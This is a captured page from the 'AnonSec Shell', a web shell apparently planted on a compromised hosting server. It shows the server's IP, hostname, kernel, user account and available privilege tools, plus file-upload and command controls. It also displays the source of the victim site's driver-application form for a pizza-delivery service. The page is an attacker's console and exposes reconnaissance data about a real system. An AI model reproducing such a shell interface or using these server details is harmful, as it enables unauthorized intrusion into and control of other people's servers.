AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.59
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_projetos/sopizzas/application/views/frontend/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_projetos/sopizzas/application/views/frontend/applydriveronline_main.php
      </div>
    </section>
    <div class="for-fixed-img" style="height: 85px;"></div>
    <section>
      <div class="driver-header">
        <div class="container paddxs">
          <div class="row">
            <div class="col-md-12 col-sm-12 col-xs-12 paddxs mctop75">
              <div class="col-md-6 paddxs">
                <div class="driver-login-box">
                  <h1>Deliver with us</h1>
                  <h2>Earn on your own schedule!</h2>
                  <?php if($this->session->flashdata('success_msg')) { ?>
                  <div class="alert alert-info text-center">
                    <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
                    <strong><?php echo $this->session->flashdata('success_msg'); ?></strong>
                  </div>
                  <?php } ?>
                  <?php if($this->session->flashdata('error_msg')) { ?>
                  <div class="alert alert-danger text-center">
                    <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
                    <strong><?php echo $this->session->flashdata('error_msg'); ?></strong>
                  </div>
                  <?php } ?>
                  <?php if(validation_errors() != FALSE) { ?>
                  <div class="alert alert-danger text-center">
                    <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
                    <strong><?php echo validation_errors(); ?></strong>
                  </div>
                  <?php } ?>
                  <?php $validator = array('role' => 'form', 'data-toggle' => 'validator'); echo form_open('applydriveronline', $validator); ?>
                  <div class="col-md-12 custom-padding-0">
                    <p class="plabel">Start the application</p>
                    <div class="form-group" >
                      <!-- <input value="<?=set_value('driver_email')?>" name="driver_email" id="driver_email" type="email" class="form-control fc-bod" placeholder="Email Address" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" data-error="Please enter an  email" data-pattern-error="Please enter a valid email" required> -->
                      <input value="<?=set_value('driver_email')?>" name="driver_email" id="driver_email" type="email" class="form-control fc-bod" placeholder="Email Address" data-error="Please enter a valid email" data-pattern-error="Please enter a valid email" required pattern="^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$" data-pattern-error="Please enter valid email.">
                      <div class="help-block with-errors"></div>
                      <!-- <input name="driver_email" id="driver_email" onKeyUp="checkdataUniquesness(this.value,'email')" onBlur="checkdataUniquesness(this.value,'email')" type="email" class="form-control fc-bod" placeholder="Email Address" required> -->
                    </div>
                    <!-- <span id="signup_messageemail"></span> -->


                    <div class="form-group">
                      <input value="<?=set_value('driver_password')?>" name="driver_password" id="driver_password" type="password" class="form-control fc-bod" placeholder="Create Password" data-error="Please enter a password" required data-minlength="6">
                      <div class="help-block with-errors"></div>
                    </div>

                  </div>
                  <div class="col-md-12 custom-padding-0">
                    <input type="hidden" name="form_name" value="driver_apply_main">
                    <button type="submit" class="btn btn-info nxt-btn">Get Started</button>
                  </div>
                </form>


                  <p>By proceeding, I agree that <?=SITENAME?> or its representatives may contact me by email, phone, or SMS (including by an automatic telephone dialing system) at the email address or phone number I provide, including for marketing purposes. I have read and understand the relevant <a href="<?=base_url();?>terms">Terms & Conditions</a> and <a href="<?=base_url();?>privacy-policy">Privacy Policy</a>.</p>
                </div>
              </div>
            </div>
          </div>          
        </div>
      </div>
    </section>
    <section id="driver-blog">
      <div class="container">
        <div class="row">
          <div class="col-md-12 col-sm-12 col-xs-12 text-center">
            <img src="<?php echo base_url() ?>assets/img/front-end/android-map-locator.png" class="maploc">
            <h1 class="text-center"><?=SITENAME?> Food Delivery Service</h1>
            <div class="col-md-6 col-sm-6">
              <img src="<?php echo base_url() ?>assets/img/front-end/dollar.png">
              <h2>Earn Good Money</h2>
              <p>Earn up to $25/hr. Sign on any time to start making money immediately.</p>
            </div>
            <div class="col-md-4 col-sm-4 hide">
              <img src="<?php echo base_url() ?>assets/img/front-end/calender.png">
              <h2>Work When You Want</h2>
              <p>Set your own schedule and work as little or as much as you want</p>
            </div>
            <div class="col-md-6 col-sm-6">
              <img src="<?php echo base_url() ?>assets/img/front-end/car.png">
              <!-- <h2>Choose Your Ride</h2> -->
              <h2>Pick Up and Drop Off</h2>
              <p>It is that simple. Once notified, you just pick up order and drop it off.</p>
            </div>
          </div>
          <div class="col-md-12 text-center mctopbot40">
            <button type="button" id="back-top" class="btn btn-info nxt-btn">Apply Now</button>
          </div>
        </div>
      </div>
    </section>


<script  type="text/javascript">
/*function checkdataUniquesness(inputtxt,txt){
  var BASE_URL = '<?php echo base_url(); ?>';
  $.ajax({
  type:"POST",
  url:BASE_URL+"frontend/checkdataUniquesness",
  data:{inputtxt:inputtxt,txt:txt},
  success:function(data){
      if(data==1){
        $('#signup_message'+txt).parent().children(".form-group").removeClass("successFLD");
        $('#signup_message'+txt).parent().children(".form-group").addClass("errorFLD");
      } else {         
        $('#signup_message'+txt).parent().children(".form-group").removeClass("errorFLD");
        $('#signup_message'+txt).parent().children(".form-group").addClass("successFLD");
      }
    
    }
  });
}*/
</script>

Anon7 - 2022
AnonSec Team